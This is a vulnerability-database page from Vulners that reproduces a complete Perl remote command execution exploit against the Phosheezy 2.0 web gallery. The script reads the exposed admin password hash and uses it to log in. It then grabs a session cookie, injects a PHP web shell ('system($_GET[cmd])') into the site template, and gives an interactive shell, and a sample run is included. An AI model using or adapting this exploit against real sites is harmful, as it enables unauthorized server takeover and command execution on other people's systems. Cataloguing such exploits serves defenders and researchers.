Vulners
Lucene search
Phosheezy 2.0 Command Execution
`#!/usr/bin/perl
# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos
# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
# ----------------------------
# Phosheezy RCE Exploit
# Coded by Osirys
# ----------------------------
#
# [+] Admin password found:
# Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
my $host = $ARGV[0];
my $pwd_path = "/config/password";
my $adm_path = "/admin.php";
my $templ_path = "/admin.php?action=3";
help("-1") unless ($host);
cheek($host) == 1 || help("-2");
&banner;
$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);
my $url = $host.$pwd_path;
my $re = get_req($url);
if ($re =~ /([0-9a-f]{40})/) {
$password = $1;
print "[+] Admin password found:\n";
print " Sha1 pwd: $password \n";
adm_log($password);
}
else {
print "[-] Unable to get sha1 Admin password\n\n";
exit(0);
}
sub adm_log() {
my $password = $_[0];
my $link = $path.".".$adm_path;
my $post = "password=$password&Login=Login";
my $length = length($post);
my @data;
my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die $!;
my $data = "POST ".$link." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".$length."\r\n\r\n".
$post."\r\n";
$socket->send($data);
print "[+] Grabbing server headers to get a valid SESSION ID ..\n";
while (my $e = <$socket>) {
push(@data,$e);
}
foreach my $e(@data) {
if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
$log_ = 1;
print "[+] Succesfully logged in as Administrator\n";
}
elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
$phpsessid = $1;
print "[+] SESSION ID grabbed: $phpsessid\n";
}
}
(($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n";
RCE_create($phpsessid);
}
sub RCE_create() {
my $phpsessid = $_[0];
my $link = $path.".".$templ_path;
my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
"le></head><body bgcolor=\"#ffffff\" text=\"#0000".
"00\">&footer=</body></html><!-- cmd --><?php sys".
"tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
my $length = length($code);
my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die $!;
my $data = "POST ".$link." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".$length."\r\n\r\n".
"$code\r\n";
$socket->send($data);
while (my $e = <$socket>) {
if ($e =~ /Edit layout again/) {
$rce_c = 1;
print "[+] Template edited, RCE Vulnerability Created !\n";
}
}
$rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n";
&exec_cmd;
}
sub exec_cmd {
print "shell\$> ";
$cmd = <STDIN>;
$cmd !~ /exit/ || die "[-] Quitting ..\n";
$exec_url = ($host."/index.php?cmd=".$cmd);
$re = get_req($exec_url);
if ($re =~ /<!-- cmd -->(.*)/) {
my $cmd = $1;
$cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
print "$cmd\n";
&exec_cmd;
}
else {
print "[-] Undefined output or bad cmd !\n";
&exec_cmd;
}
}
sub get_req() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}
sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}
sub get_data() {
my $host = $_[0];
$host =~ /http:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$h0st !~ /www/ || $h0st =~ s/www\.//;
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}
sub banner {
print "\n".
" ---------------------------- \n".
" Phosheezy RCE Exploit \n".
" Coded by Osirys \n".
" ---------------------------- \n\n";
}
sub help() {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Cheek that you provide a hostname address!\n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2009 00:00Current
7.4High risk
Vulners AI Score7.4